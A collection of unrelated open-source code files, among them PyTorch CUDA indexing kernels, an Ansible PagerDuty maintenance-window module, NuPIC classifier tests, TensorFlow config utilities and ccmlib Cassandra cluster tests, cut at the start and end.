assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see".
x = tensor.tensor(broadcastable=(False, True, False), dtype='float64')
out = x[i].dimshuffle(1)
g = FunctionGraph([x, i], [out])
dimshuffle_subtensor(g)
topo = g.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
# Test dimshuffle remove dimensions the subtensor don't "see" but
# have in between dimensions.
x = tensor.tensor(broadcastable=(False, True, False, True),
dtype='float64')
out = x[i].dimshuffle(1)
f = theano.function([x, i], out)
topo = f.maker.fgraph.toposort()
assert any([not isinstance(x, DimShuffle) for x in topo])
assert f(numpy.random.rand(5, 1, 4, 1), 2).shape == (4,) | unknown | codeparrot/codeparrot-clean | ||
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS
#include <ATen/native/cuda/IndexKernel.h>
#include <ATen/native/TensorAdvancedIndexing.h> // For at::native::index_out
#include <ATen/core/Tensor.h>
#include <ATen/core/List.h>
#include <ATen/ExpandUtils.h>
#include <ATen/MemoryOverlap.h>
#include <ATen/NamedTensorUtils.h>
#ifndef AT_PER_OPERATOR_HEADERS
#include <ATen/Functions.h>
#include <ATen/NativeFunctions.h>
#include <ATen/CUDAFunctions.h>
#else
#include <ATen/ops/index_cuda_dispatch.h>
#include <ATen/ops/empty.h>
#include <ATen/ops/masked_scatter_native.h>
#include <ATen/ops/masked_select_native.h>
#endif
namespace at::native {
static Tensor & masked_select_out_cuda_impl(Tensor & result, const Tensor & self, const Tensor & mask) {
NoNamesGuard guard;
TORCH_CHECK(mask.scalar_type() == ScalarType::Bool,
"masked_select: expected BoolTensor for mask");
TORCH_CHECK(self.scalar_type() == result.scalar_type(),
"masked_select(): self and result must have the same scalar type");
auto mask_temp = (mask.dim() == 0)
? c10::MaybeOwned<Tensor>::owned(mask.unsqueeze(0))
: c10::MaybeOwned<Tensor>::borrowed(mask);
auto self_temp = (self.dim() == 0)
? c10::MaybeOwned<Tensor>::owned(self.unsqueeze(0))
: c10::MaybeOwned<Tensor>::borrowed(self);
// Cannot reassign to mask_temp and self_temp here! if they are
// owning and expand_outplace returns a borrow, the returned borrow
// would dangle.
auto [mask_expanded, self_expanded] = expand_outplace(*mask_temp, *self_temp);
at::cuda::index_out(
result, *self_expanded,
c10::List<std::optional<at::Tensor>>({*std::move(mask_expanded)}));
return result;
}
Tensor masked_select_cuda(const Tensor & self, const Tensor & mask) {
namedinference::compute_broadcast_outnames(self, mask);
Tensor result = at::empty({0}, self.options());
return masked_select_out_cuda_impl(result, self, mask);
}
Tensor & masked_select_out_cuda(const Tensor & self, const Tensor & mask, Tensor & result) {
namedinference::compute_broadcast_outnames(self, mask);
return masked_select_out_cuda_impl(result, self, mask);
}
Tensor & masked_scatter__cuda(Tensor& self, const Tensor& mask, const Tensor& source) {
at::assert_no_internal_overlap(self);
TORCH_CHECK(
self.scalar_type() == source.scalar_type(),
"masked_scatter_: expected self and source to have same dtypes but got ",
self.scalar_type(),
" and ",
source.scalar_type());
TORCH_CHECK(mask.dtype() == ScalarType::Bool, "masked_scatter_ only supports boolean masks, "
"but got mask with dtype ", mask.dtype());
c10::MaybeOwned<Tensor> b_mask = expand_inplace(self, mask, "masked_scatter_");
if (self.numel() == 0) {
return self;
}
auto maskPrefixSum = at::empty(self.sizes(), mask.options().dtype(kLong));
launch_masked_scatter_kernel(self, *b_mask, maskPrefixSum, source);
return self;
}
} // namespace at::native | cpp | github | https://github.com/pytorch/pytorch | aten/src/ATen/native/cuda/IndexKernel.cpp |
'''
Created on Dec 1, 2016
@author: David Zwicker <dzwicker@seas.harvard.edu>
'''
from __future__ import division
import itertools
import numpy as np
from scipy import optimize, spatial
from six.moves import range
def _iter_problematic_edges(edges):
""" generator that goes through a list of edges and returns intervals that
are problematic, i.e., where the edge would cross a previous edge. Yields
pairs of indices that denote the indices of the edges that surround a
problem region. """
i = 1
while i < len(edges):
if edges[i] < edges[i - 1]:
# found problem
s = i - 1
e_s = edges[s]
i += 1
for j in range(i, len(edges)):
if edges[j] >= e_s:
# problem ends
yield s, j
i = j
break
else:
# problem did not end
if any(e > 0 for e in edges[s + 1:]):
yield s, len(edges)
else:
i += 1
def _fix_edge_order(edges, p_f, p_t, dists_ft):
""" reassigns edges such that they don't cross and have minimal length """
dim_f, dim_t = len(p_f), len(p_t)
assert dists_ft.shape == (dim_f, dim_t)
assert len(edges) == len(p_f)
# iterate over all problematic regions and try to resolve them
for f_s, f_e in _iter_problematic_edges(edges):
# f_s is the index of the last correct vertex
# f_e is the index of the first correct vertex after the problem
# get candidate connections
if f_e < dim_f:
ts = np.arange(edges[f_s], edges[f_e] + 1)
else:
ts = np.r_[np.arange(edges[f_s], dim_t), 0]
subdists = dists_ft[f_s+1:f_e, ts]
num_f = f_e - f_s - 1 # number of vertices to correct
num_t = len(ts) # number of vertices to choose from
assert subdists.shape == (num_f, num_t)
# iterate through all possibilities
best_offset, best_dist = None, np.inf
for offset in itertools.product(range(num_t), repeat=num_f):
d_offset = np.diff(offset)
if np.any(d_offset < 0):
continue
dist = sum(subdists[i, offset[i]] for i in range(num_f))
if dist < best_dist:
best_dist = dist
best_offset = offset
# shift by 1 because np.diff shifted indices
new_t = ts[0] + best_offset
new_t[new_t >= dim_t] = 0
edges[f_s + 1:f_e] = new_t
return edges
def register_polygons(coords1, coords2):
""" returns oriented edges between two polygons that are given by their
coordinate sequences.
The function returns two list describing the edges that connect the two
polygons. The first list is of length `len(coords1)` and gives for each
vertex of the first polygon an index into `coords2` to describe the edge.
The second list is the associated list for edges from polygon 2 to 1.
The algorithm tries to produce non-crossing edges with minimal length, which
could be useful for morphing one polygon into the other. This algorithm
works best when the centroids are close to each other. Note that this
implementation iterates through all possible edge combinations of a
problematic region. If the polygons are complex and don't overlap well, this
algorithm might take a very long times to yield a result.
"""
p1 = np.array(coords1, dtype=np.double, copy=True)
p2 = np.array(coords2, dtype=np.double, copy=True)
# build the distance matrix between the two polygons
dists = spatial.distance_matrix(coords1, coords2)
# find the points with minimal distance from each other
x, y = np.nonzero(dists == np.min(dists))
x, y = x[0], y[0]
# reorder the points such that the closest points are in the first position
p1 = np.roll(p1, -x, axis=0)
p2 = np.roll(p2, -y, axis=0)
dists = np.roll(np.roll(dists, -x, axis=0), -y, axis=1)
# assert np.all(dists == spatial.distance_matrix(p1, p2))
# potential edges from 1 to 2 and vice versa
e12 = np.argmin(dists, axis=1)
e21 = np.argmin(dists, axis=0)
# fix edge order in place
_fix_edge_order(e12, p1, p2, dists)
_fix_edge_order(e21, p2, p1, dists.T)
# roll back the edges so they align with the original coordinates
e12 = np.roll(e12, x)
e12 = (e12 + y) % len(p2)
e21 = np.roll(e21, y)
e21 = (e21 + x) % len(p1)
return e12, e21
def register_polygons_fast(coords1, coords2, ret_dists=False, opt_args=None):
""" returns oriented edges between two polygons that are given by their
coordinate sequences.
The function returns two list describing the edges that connect the two
polygons. The first list is of length `len(coords1)` and gives for each
vertex of the first polygon an index into `coords2` to describe the edge.
The second list is the associated list for edges from polygon 2 to 1.
The algorithm tries to produce non-crossing edges with minimal length, which
could be useful for morphing one polygon into the other. This algorithm
works best when the centroids are close to each other. This implementation
uses stochastic global optimization to find a good solution quickly.
However, this doesn't guarantee that the optimal solution is found.
Moreover, subsequent calls with the same arguments might lead to different
results. The algorithm uses `scipy.optimize.basinhopping` to find the
solution with minimal total edge length. The optimization algorithm can be
influences by passing suitable keyword arguments using `opt_args`
"""
dim1, dim2 = len(coords1), len(coords2)
# determine distance between all points
dists = spatial.distance_matrix(coords1, coords2)
# determine starting edge (with minimal distance)
i1, i2 = np.unravel_index(np.argmin(dists), dists.shape)
# place the other edges equidistantly in index space
e1 = np.roll(np.linspace(i2, i2 + dim2, num=dim1, dtype=np.int) % dim2, i1)
e2 = np.roll(np.linspace(i1, i1 + dim1, num=dim2, dtype=np.int) % dim1, i2)
x0 = np.r_[e1, e2]
def calc_cost(x):
""" cost function = total edge length """
x = x.astype(np.int)
x1, x2 = x[:dim1], x[dim1:]
return (dists[np.arange(dim1), x1].sum() +
dists[x2, np.arange(dim2)].sum())
def take_step(x):
""" modifies one edge randomly """
for _ in range(10): # test at most 10 edges
k = np.random.randint(dim1 + dim2)
if k < dim1:
# modify edge from 1 to 2
x_p = x[(k - 1) % dim1]
x_n = x[(k + 1) % dim1]
if x_n == x_p:
continue # this edge is fixed => try another
if x_n < x_p:
x_n += dim2 # wrap around
x[k] = np.random.randint(x_p, x_n) % dim2
break
else:
# modify edge from 2 to 1
k -= dim1
x_p = x[dim1 + (k - 1) % dim2]
x_n = x[dim1 + (k + 1) % dim2]
if x_n == x_p:
continue # this edge is fixed => try another
if x_n < x_p:
x_n += dim1 # wrap around
x[dim1 + k] = np.random.randint(x_p, x_n) % dim1
break
return x
# determine parameters
if opt_args is None:
opt_args = {}
niter = opt_args.pop('niter', None)
if niter is None:
niter = 10 * (dim1 + dim2) # move each edge about 10 times
# run the global optimization
res = optimize.basinhopping(calc_cost, x0, niter=niter, take_step=take_step,
**opt_args)
# return optimal edges
x = res.x.astype(np.int)
if ret_dists:
return x[:dim1], x[dim1:], dists
else:
return x[:dim1], x[dim1:] | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: pagerduty
short_description: Create PagerDuty maintenance windows
description:
- This module will let you create PagerDuty maintenance windows
version_added: "1.2"
author:
- "Andrew Newdigate (@suprememoocow)"
- "Dylan Silva (@thaumos)"
- "Justin Johns"
- "Bruce Pennypacker"
requirements:
- PagerDuty API access
options:
state:
description:
- Create a maintenance window or get a list of ongoing windows.
required: true
default: null
choices: [ "running", "started", "ongoing", "absent" ]
aliases: []
name:
description:
- PagerDuty unique subdomain.
required: true
default: null
choices: []
aliases: []
user:
description:
- PagerDuty user ID.
required: true
default: null
choices: []
aliases: []
passwd:
description:
- PagerDuty user password.
required: true
default: null
choices: []
aliases: []
token:
description:
- A pagerduty token, generated on the pagerduty site. Can be used instead of
user/passwd combination.
required: true
default: null
choices: []
aliases: []
version_added: '1.8'
requester_id:
description:
- ID of user making the request. Only needed when using a token and creating a maintenance_window.
required: true
default: null
choices: []
aliases: []
version_added: '1.8'
service:
description:
- A comma separated list of PagerDuty service IDs.
required: false
default: null
choices: []
aliases: [ services ]
hours:
description:
- Length of maintenance window in hours.
required: false
default: 1
choices: []
aliases: []
minutes:
description:
- Maintenance window in minutes (this is added to the hours).
required: false
default: 0
choices: []
aliases: []
version_added: '1.8'
desc:
description:
- Short description of maintenance window.
required: false
default: Created by Ansible
choices: []
aliases: []
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
'''
EXAMPLES='''
# List ongoing maintenance windows using a user/passwd
- pagerduty: name=companyabc user=example@example.com passwd=password123 state=ongoing
# List ongoing maintenance windows using a token
- pagerduty: name=companyabc token=xxxxxxxxxxxxxx state=ongoing
# Create a 1 hour maintenance window for service FOO123, using a user/passwd
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=running
service=FOO123
# Create a 5 minute maintenance window for service FOO123, using a token
- pagerduty: name=companyabc
token=xxxxxxxxxxxxxx
hours=0
minutes=5
state=running
service=FOO123
# Create a 4 hour maintenance window for service FOO123 with the description "deployment".
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=running
service=FOO123
hours=4
desc=deployment
register: pd_window
# Delete the previous maintenance window
- pagerduty: name=companyabc
user=example@example.com
passwd=password123
state=absent
service={{ pd_window.result.maintenance_window.id }}
'''
import datetime
import base64
def auth_header(user, passwd, token):
if token:
return "Token token=%s" % token
auth = base64.encodestring('%s:%s' % (user, passwd)).replace('\n', '')
return "Basic %s" % auth
def ongoing(module, name, user, passwd, token):
url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows/ongoing"
headers = {"Authorization": auth_header(user, passwd, token)}
response, info = fetch_url(module, url, headers=headers)
if info['status'] != 200:
module.fail_json(msg="failed to lookup the ongoing window: %s" % info['msg'])
try:
json_out = json.loads(response.read())
except:
json_out = ""
return False, json_out, False
def create(module, name, user, passwd, token, requester_id, service, hours, minutes, desc):
now = datetime.datetime.utcnow()
later = now + datetime.timedelta(hours=int(hours), minutes=int(minutes))
start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
end = later.strftime("%Y-%m-%dT%H:%M:%SZ")
url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows"
headers = {
'Authorization': auth_header(user, passwd, token),
'Content-Type' : 'application/json',
}
request_data = {'maintenance_window': {'start_time': start, 'end_time': end, 'description': desc, 'service_ids': service}}
if requester_id:
request_data['requester_id'] = requester_id
else:
if token:
module.fail_json(msg="requester_id is required when using a token")
data = json.dumps(request_data)
response, info = fetch_url(module, url, data=data, headers=headers, method='POST')
if info['status'] != 200:
module.fail_json(msg="failed to create the window: %s" % info['msg'])
try:
json_out = json.loads(response.read())
except:
json_out = ""
return False, json_out, True
def absent(module, name, user, passwd, token, requester_id, service):
url = "https://" + name + ".pagerduty.com/api/v1/maintenance_windows/" + service[0]
headers = {
'Authorization': auth_header(user, passwd, token),
'Content-Type' : 'application/json',
}
request_data = {}
if requester_id:
request_data['requester_id'] = requester_id
else:
if token:
module.fail_json(msg="requester_id is required when using a token")
data = json.dumps(request_data)
response, info = fetch_url(module, url, data=data, headers=headers, method='DELETE')
if info['status'] != 200:
module.fail_json(msg="failed to delete the window: %s" % info['msg'])
try:
json_out = json.loads(response.read())
except:
json_out = ""
return False, json_out, True
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, choices=['running', 'started', 'ongoing', 'absent']),
name=dict(required=True),
user=dict(required=False),
passwd=dict(required=False),
token=dict(required=False),
service=dict(required=False, type='list', aliases=["services"]),
requester_id=dict(required=False),
hours=dict(default='1', required=False),
minutes=dict(default='0', required=False),
desc=dict(default='Created by Ansible', required=False),
validate_certs = dict(default='yes', type='bool'),
)
)
state = module.params['state']
name = module.params['name']
user = module.params['user']
passwd = module.params['passwd']
token = module.params['token']
service = module.params['service']
hours = module.params['hours']
minutes = module.params['minutes']
token = module.params['token']
desc = module.params['desc']
requester_id = module.params['requester_id']
if not token and not (user or passwd):
module.fail_json(msg="neither user and passwd nor token specified")
if state == "running" or state == "started":
if not service:
module.fail_json(msg="service not specified")
(rc, out, changed) = create(module, name, user, passwd, token, requester_id, service, hours, minutes, desc)
if rc == 0:
changed=True
if state == "ongoing":
(rc, out, changed) = ongoing(module, name, user, passwd, token)
if state == "absent":
(rc, out, changed) = absent(module, name, user, passwd, token, requester_id, service)
if rc != 0:
module.fail_json(msg="failed", result=out)
module.exit_json(msg="success", result=out, changed=changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
main() | unknown | codeparrot/codeparrot-clean | ||
#! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy as np
import unittest
from nupic.algorithms.KNNClassifier import KNNClassifier
class KNNClassifierTest(unittest.TestCase):
def testOverlapDistanceMethodStandard(self):
"""Tests standard learning case for raw overlap"""
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
b = np.array([2, 4, 8, 12, 14, 18, 20, 28, 30], dtype=np.int32)
numPatterns = classifier.learn(a, 0, isSparse=dimensionality)
self.assertEquals(numPatterns, 1)
numPatterns = classifier.learn(b, 1, isSparse=dimensionality)
self.assertEquals(numPatterns, 2)
denseA = np.zeros(dimensionality)
denseA[a] = 1.0
cat, _, _, _ = classifier.infer(denseA)
self.assertEquals(cat, 0)
denseB = np.zeros(dimensionality)
denseB[b] = 1.0
cat, _, _, _ = classifier.infer(denseB)
self.assertEquals(cat, 1)
def testOverlapDistanceMethodBadSparsity(self):
"""Sparsity (input dimensionality) less than input array"""
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
# Learn with incorrect dimensionality, less than some bits (23, 29)
with self.assertRaises(RuntimeError):
classifier.learn(a, 0, isSparse=20)
def testOverlapDistanceMethodInconsistentDimensionality(self):
"""Inconsistent sparsity (input dimensionality)"""
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
# Learn with incorrect dimensionality, greater than largest ON bit, but
# inconsistent when inferring
numPatterns = classifier.learn(a, 0, isSparse=31)
self.assertEquals(numPatterns, 1)
denseA = np.zeros(dimensionality)
denseA[a] = 1.0
cat, _, _, _ = classifier.infer(denseA)
self.assertEquals(cat, 0)
def testOverlapDistanceMethodStandardUnsorted(self):
"""If sparse representation indices are unsorted expect error."""
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([29, 3, 7, 11, 13, 17, 19, 23, 1], dtype=np.int32)
b = np.array([2, 4, 20, 12, 14, 18, 8, 28, 30], dtype=np.int32)
with self.assertRaises(RuntimeError):
classifier.learn(a, 0, isSparse=dimensionality)
with self.assertRaises(RuntimeError):
classifier.learn(b, 1, isSparse=dimensionality)
def testOverlapDistanceMethodEmptyArray(self):
"""Tests case where pattern has no ON bits"""
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([], dtype=np.int32)
numPatterns = classifier.learn(a, 0, isSparse=dimensionality)
self.assertEquals(numPatterns, 1)
denseA = np.zeros(dimensionality)
denseA[a] = 1.0
cat, _, _, _ = classifier.infer(denseA)
self.assertEquals(cat, 0)
@unittest.skip("Finish when infer has options for sparse and dense "
"https://github.com/numenta/nupic/issues/2198")
def testOverlapDistanceMethod_ClassifySparse(self):
params = {"distanceMethod": "rawOverlap"}
classifier = KNNClassifier(**params)
dimensionality = 40
a = np.array([1, 3, 7, 11, 13, 17, 19, 23, 29], dtype=np.int32)
b = np.array([2, 4, 8, 12, 14, 18, 20, 28, 30], dtype=np.int32)
classifier.learn(a, 0, isSparse=dimensionality)
classifier.learn(b, 1, isSparse=dimensionality)
# TODO Test case where infer is passed a sparse representation after
# infer() has been extended to handle sparse and dense
cat, _, _, _ = classifier.infer(a)
self.assertEquals(cat, 0)
cat, _, _, _ = classifier.infer(b)
self.assertEquals(cat, 1)
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2025 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import _LazyModule
from ...utils.import_utils import define_import_structure
if TYPE_CHECKING:
from .configuration_dots1 import *
from .modeling_dots1 import *
else:
import sys
_file = globals()["__file__"]
sys.modules[__name__] = _LazyModule(__name__, _file, define_import_structure(_file), module_spec=__spec__) | python | github | https://github.com/huggingface/transformers | src/transformers/models/dots1/__init__.py |
# frozen_string_literal: true
module ActiveModel
def self.deprecator # :nodoc:
@deprecator ||= ActiveSupport::Deprecation.new
end
end | ruby | github | https://github.com/rails/rails | activemodel/lib/active_model/deprecator.rb |
"""Provides scheduling routines for stackless tasklets.
The scheduler itself runs as a tasklet. It blocks waiting
for input on the channel passed in. When new data is sent
on this channel, the scheduler wakes and begins processing
of the data.
"""
import stackless
from pype import Pype
from graph import get_pairlist, topsort
import sys
import traceback
def sched(ch, graph):
"""Sits in an infinite loop waiting on the channel to recieve data.
The procedure prolog takes care of sorting the
input graph into a dependency list and initializing
the filter tasklets used to construct the graph.
@param graph: The graph representing the work flow
@type graph: Python dict organized as a graph struct
@param ch: The stackless channel to listen on
@type ch: stackless.channel
@return: nothing
"""
edgeList = get_pairlist(graph)
nodes = topsort(edgeList)
tasks = []
inputEdge = Pype()
for n in nodes:
# start this microthread
tasks.append(stackless.tasklet(n.run)())
try:
# get this nodes outputs
edges = graph[n]
except:
pass
else:
# for each output
for e in edges:
e1 = Pype()
# does this port exist
if not n.has_port(edges[e][0]):
print 'Trying to connect undefined output port', n, edges[e][0]
sys.exit(1)
n.connect_output(edges[e][0], e1)
# does this port exist
if not e.has_port(edges[e][1]):
print 'Trying to connect undefined input port', e, edges[e][1]
sys.exit(1)
e.connect_input(edges[e][1], e1)
# Added so that incoming data is fed to every input adapter
# should check if in exists and create it if it doesn't
# because a user could remove the input port by accident
inputEdges = []
for n in nodes:
if n.get_type() == 'ADAPTER':
ie = Pype()
n.connect_input('in', ie)
inputEdges.append(ie)
#nodes[0].connect_input('in', inputEdge)
while True:
data = ch.receive()
for ie in inputEdges:
ie.send(data)
#inputEdge.send(data)
try:
tasks[0].run()
except:
traceback.print_exc() | unknown | codeparrot/codeparrot-clean | ||
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import ast
import re
import os
import logging
logger = logging.getLogger("logger")
def tvars_num():
logger.info("model variables:")
nvars = 0
for var in tf.trainable_variables():
logger.debug(var)
shape = var.get_shape().as_list()
nvars += np.prod(shape)
logger.info('%2.2fM variables' % (nvars * 1e-6))
return nvars
def read_flags(config, args):
# assign flags into config
for arg in sorted(vars(args)):
key = arg
val = getattr(args, arg)
if val is not None:
if key == "drop_s" or key == "drop_h" or key == "max_update_norm":
val = ast.literal_eval(val)
setattr(config, key, val)
return config
def get_config(config_pool, config_name):
if config_name == "mos_gl":
return config_pool.MosGLConfig()
else:
raise ValueError("Invalid model: %s", config_name)
def print_config(config):
attrs = [attr for attr in dir(config) if not attr.startswith('__')]
logger.info('\n' + '\n'.join("%s: %s" % (item, getattr(config, item)) for item in attrs))
def write_config(config, path):
attrs = [attr for attr in dir(config) if not attr.startswith('__')]
str = '\n'.join("%s: %s" % (item, getattr(config, item)) for item in attrs)
f = open(path, "w")
f.write(str)
f.close()
def get_simulation_name(args):
waiver = ["cpu_device", "gpu_devices", "start_layer", "ckpt_file", "save", "verbose", "nonmono", "debug"]
name = []
for arg in sorted(vars(args)):
key = arg
val = getattr(args, arg)
if val is not None and key not in waiver:
name.append(key + "-" + str(val).replace(",","-").replace(" ", "").replace("[", "").replace("]", ""))
return "_".join(name)
def get_gpu_devices(str):
devices_num = re.findall("[0-9]", str)
return devices_num
def get_vars2restore(layer, model):
if layer == 1:
return None
else:
vars2load = []
logger.debug("vars to restore when adding new layer")
for var in tf.trainable_variables():
logger.debug(var.op.name)
if "embedding" in var.op.name:
logger.debug("added")
vars2load.append(var)
if "layer_" in var.op.name:
lstm_idx = re.findall("layer_([0-9])+", var.op.name)
if int(lstm_idx[0]) < layer:
vars2load.append(var)
logger.debug("added")
if "mos" in var.op.name and model.hid_size[layer-1] == model.hid_size[layer-2]:
logger.debug("added")
vars2load.append(var)
if "w_embed_out" in var.op.name:
logger.debug("added")
vars2load.append(var)
if "b_out" in var.op.name:
logger.debug("added")
vars2load.append(var)
return vars2load
def write_to_summary(sum_path, config, train, valid, test):
attr = sorted([attr for attr in dir(config) if not attr.startswith('__')])
if not os.path.exists(sum_path):
f = open("./summary.csv", "w")
header = list()
for arg in attr:
header.append(arg)
header.extend(["train_perp_tot", "valid_perp_tot", "test_perp_tot", "train_perp_0", "valid_perp_0", "test_perp_0"])
f.write(",".join(header) +"\n")
else:
f = open("./summary.csv", "a")
sum_list = list()
for arg in attr:
sum_list.append(str(getattr(config, arg)).replace(",","-").replace(" ", ""))
scores = [[str(t), str(v), str(ts)] for t, v, ts in zip(train, valid, test)]
sum_list.extend(scores[-1])
scores.pop()
scores = [str(item) for sublist in scores for item in sublist]
sum_list.extend(scores)
f.write(",".join(sum_list) +"\n")
f.close()
def remove_tempstate_files(dir):
for (folder, subs, files) in os.walk(dir):
for filename in files:
if "tempstate" in filename:
file_path = os.path.join(dir, filename)
yield(file_path) | unknown | codeparrot/codeparrot-clean | ||
import sys
from six import StringIO
import ccmlib
from ccmlib.cluster import Cluster
from . import TEST_DIR, ccmtest
sys.path = [".."] + sys.path
CLUSTER_PATH = TEST_DIR
class TestCCMLib(ccmtest.Tester):
def restart_test(self):
self.cluster = Cluster(CLUSTER_PATH, "restart", cassandra_version='2.0.9')
self.cluster.populate(3)
self.cluster.start()
self.cluster.stop()
self.cluster.start()
self.cluster.show(True)
def test2(self):
self.cluster = Cluster(CLUSTER_PATH, "test2", cassandra_version='2.0.3')
self.cluster.populate(2)
self.cluster.start()
self.cluster.set_log_level("ERROR")
class FakeNode:
name = "non-existing node"
self.cluster.remove(FakeNode())
[node1, node2] = self.cluster.nodelist()
self.cluster.remove(node1)
self.cluster.show(True)
self.cluster.show(False)
#self.cluster.stress([])
self.cluster.compact()
self.cluster.drain()
self.cluster.stop()
def test3(self):
self.cluster = Cluster(CLUSTER_PATH, "test3", cassandra_version='2.0.3')
self.cluster.populate(2)
self.cluster.start()
self.cluster.cleanup()
self.cluster.clear()
self.cluster.stop()
class TestRunCqlsh(ccmtest.Tester):
def setUp(self):
'''Create a cluster for cqlsh tests. Assumes that ccmtest.Tester's
teardown() method will safely stop and remove self.cluster.'''
self.cluster = Cluster(CLUSTER_PATH, "run_cqlsh",
cassandra_version='git:trunk')
self.cluster.populate(1).start(wait_for_binary_proto=True)
[self.node] = self.cluster.nodelist()
def run_cqlsh_printing(self, return_output, show_output):
'''Parameterized test. Runs run_cqlsh with options to print the output
and to return it as a string, or with these options combined, depending
on the values of the arguments.'''
# redirect run_cqlsh's stdout to a string buffer
old_stdout, sys.stdout = sys.stdout, StringIO()
rv = self.node.run_cqlsh('DESCRIBE keyspaces;',
return_output=return_output,
show_output=show_output)
# put stdout back where it belongs and get the built string value
sys.stdout, printed_output = old_stdout, sys.stdout.getvalue()
if return_output:
# we should see names of system keyspaces
self.assertIn('system', rv[0])
# stderr should be empty
self.assertEqual('', rv[1])
else:
# implicitly-returned None
self.assertEqual(rv, None)
if show_output:
self.assertIn('system', printed_output)
else:
# nothing should be printed if (not show_output)
self.assertEqual(printed_output, '')
if return_output and show_output:
self.assertEqual(printed_output, rv[0])
class TestNodeLoad(ccmtest.Tester):
def test_rejects_multiple_load_lines(self):
info = 'Load : 699 KiB\nLoad : 35 GiB'
with self.assertRaises(RuntimeError):
ccmlib.node._get_load_from_info_output(info)
info = 'Load : 699 KB\nLoad : 35 GB'
with self.assertRaises(RuntimeError):
ccmlib.node._get_load_from_info_output(info)
def test_rejects_unexpected_units(self):
infos = ['Load : 200 PiB', 'Load : 200 PB', 'Load : 12 Parsecs']
for info in infos:
with self.assertRaises(RuntimeError):
ccmlib.node._get_load_from_info_output(info)
def test_gets_correct_value(self):
info_value = [('Load : 328.45 KiB', 328.45),
('Load : 328.45 KB', 328.45),
('Load : 295.72 MiB', 295.72 * 1024),
('Load : 295.72 MB', 295.72 * 1024),
('Load : 183.79 GiB', 183.79 * 1024 * 1024),
('Load : 183.79 GB', 183.79 * 1024 * 1024),
('Load : 82.333 TiB', 82.333 * 1024 * 1024 * 1024),
('Load : 82.333 TB', 82.333 * 1024 * 1024 * 1024)]
for info, value in info_value:
self.assertEqual(ccmlib.node._get_load_from_info_output(info),
value)
def test_with_full_info_output(self):
data = ('ID : 82800bf3-8c1a-4355-9b72-e19aa61d9fba\n'
'Gossip active : true\n'
'Thrift active : true\n'
'Native Transport active: true\n'
'Load : 247.59 MiB\n'
'Generation No : 1426190195\n'
'Uptime (seconds) : 526\n'
'Heap Memory (MB) : 222.83 / 495.00\n'
'Off Heap Memory (MB) : 1.16\n'
'Data Center : dc1\n'
'Rack : r1\n'
'Exceptions : 0\n'
'Key Cache : entries 41, size 3.16 KB, capacity 24 MB, 19 hits, 59 requests, 0.322 recent hit rate, 14400 save period in seconds\n'
'Row Cache : entries 0, size 0 bytes, capacity 0 bytes, 0 hits, 0 requests, NaN recent hit rate, 0 save period in seconds\n'
'Counter Cache : entries 0, size 0 bytes, capacity 12 MB, 0 hits, 0 requests, NaN recent hit rate, 7200 save period in seconds\n'
'Token : -9223372036854775808\n')
self.assertEqual(ccmlib.node._get_load_from_info_output(data),
247.59 * 1024)
data = ('ID : 82800bf3-8c1a-4355-9b72-e19aa61d9fba\n'
'Gossip active : true\n'
'Thrift active : true\n'
'Native Transport active: true\n'
'Load : 247.59 MB\n'
'Generation No : 1426190195\n'
